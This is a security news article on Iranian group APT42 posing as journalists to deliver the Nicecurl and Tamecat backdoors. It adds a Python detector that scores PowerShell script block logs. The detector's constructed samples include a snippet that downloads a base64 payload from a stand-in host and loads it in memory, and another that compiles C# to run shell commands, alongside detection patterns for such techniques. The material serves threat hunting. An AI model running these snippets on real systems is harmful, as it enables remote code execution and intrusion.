Iranian hackers pose as journalists to push backdoor malware (Security News, May 2024)

The Iranian state-backed threat actor tracked as APT42 is employing social engineering attacks, including posing as journalists, to breach corporate networks and cloud environments of Western and Middle Eastern targets.
Google threat analysts following APT42's operations report that the hackers use malicious emails to infect their targets with two custom backdoors, namely "Nicecurl" and "Tamecat," which provide command execution and data exfiltration capabilities.
Tamecat, the more complex of the two, is a PowerShell backdoor that can execute arbitrary PowerShell code or C# scripts, giving APT42 considerable operational flexibility for data theft and extensive system manipulation.
The full list of Indicators of Compromise for the recent APT42 campaign and YARA rules for detecting the NICECURL and TAMECAT malware can be found at the end of Google's report.
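The report's YARA rules match the malware files themselves; a complementary host-side check for the behaviour described above (a PowerShell implant compiling and running C# at runtime) is to triage PowerShell script block logs (Operational event 4104) for in-memory C# compilation and reflective assembly loading. The following is an added example, not code from Google's report and not derived from Nicecurl or Tamecat samples: the script block texts are constructed for illustration, and the indicator patterns and score thresholds are generic hunting heuristics chosen here, not signatures for this campaign.

```python
import re

# Constructed sample ScriptBlockText values, as they would appear in the
# PowerShell Operational log (event 4104). Illustrative only, not real samples.
SAMPLES = {
    # Routine administration: loads a module and exports a report.
    "admin_module": r'''
Import-Module ActiveDirectory
Get-ADUser -Filter * -Properties LastLogonDate | Export-Csv C:\reports\users.csv
''',
    # Inline C# compiled with Add-Type, then used to spawn a shell command.
    "inline_csharp": r'''
$src = @"
using System; using System.Diagnostics;
public class Runner { public static string Run(string c) {
  var p = Process.Start("cmd.exe", "/c " + c); p.WaitForExit(); return "done"; } }
"@
Add-Type -TypeDefinition $src
[Runner]::Run("whoami")
''',
    # Downloads a base64 blob and loads it as an assembly without touching disk.
    "reflective_load": r'''
$b = (New-Object Net.WebClient).DownloadString("http://example.invalid/p")
[System.Reflection.Assembly]::Load([Convert]::FromBase64String($b)) | Out-Null
''',
}

# Hypothetical indicator set: (name, weight, pattern). Weights are a
# hunting heuristic chosen for this example, not a published scoring model.
INDICATORS = [
    ("inline_csharp_compile", 2,
     re.compile(r"Add-Type\s+(?:[^\n]*\s)?-(?:TypeDefinition|MemberDefinition)\b", re.I)),
    ("reflective_assembly_load", 3,
     re.compile(r"\[(?:System\.)?Reflection\.Assembly\]::Load\(", re.I)),
    ("base64_decode", 1, re.compile(r"FromBase64String", re.I)),
    ("network_fetch", 1,
     re.compile(r"DownloadString|DownloadData|Invoke-WebRequest|Invoke-RestMethod", re.I)),
    ("process_spawn", 1, re.compile(r"Process\.Start\(|Start-Process\b", re.I)),
    ("invoke_expression", 1, re.compile(r"\bInvoke-Expression\b|\biex\b", re.I)),
]

SUSPICIOUS_THRESHOLD = 3  # assumed cut-off; tune against your own baseline


def triage(script_block: str) -> dict:
    """Score one script block text and return the indicators it matched."""
    hits = [name for name, _w, pat in INDICATORS if pat.search(script_block)]
    score = sum(w for name, w, _p in INDICATORS if name in hits)
    return {
        "indicators": hits,
        "score": score,
        "suspicious": score >= SUSPICIOUS_THRESHOLD,
    }


def triage_all(samples: dict) -> dict:
    """Run triage over a mapping of record name -> ScriptBlockText."""
    return {name: triage(text) for name, text in samples.items()}


if __name__ == "__main__":
    for name, result in triage_all(SAMPLES).items():
        flag = "SUSPICIOUS" if result["suspicious"] else "ok"
        print(f"{name:16s} {flag:10s} score={result['score']} {result['indicators']}")
```

In practice you would feed this the ScriptBlockText field of 4104 events (for example from an EVTX export or a SIEM query) and baseline it against your own administrative tooling, since legitimate modules also call Add-Type; the score is meant to rank script blocks for review, not to block anything on its own.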
Related news
- Suspected Iranian Hackers Used Compromised Indian Firm's Email to Target U.A.E. Aviation Sector
- Chinese Hackers Breach Juniper Networks Routers With Custom Backdoors and Rootkits
- New 'Rules File Backdoor' Attack Lets Hackers Inject Malicious Code via AI Code Editors
- Chinese FamousSparrow hackers deploy upgraded malware in attacks
- North Korean Hackers Deploy BeaverTail Malware via 11 Malicious npm Packages
- Chinese Hackers Target Linux Systems Using SNOWLIGHT Malware and VShell Tool
- State-Sponsored Hackers Weaponize ClickFix Tactic in Targeted Malware Campaigns
- Chinese hackers target Russian govt with upgraded RAT malware
- Hackers Abuse Russian Bulletproof Host Proton66 for Global Attacks and Malware Delivery
- Iran-Linked Hackers Target Israel with MURKYTOUR Malware via Fake Job Campaign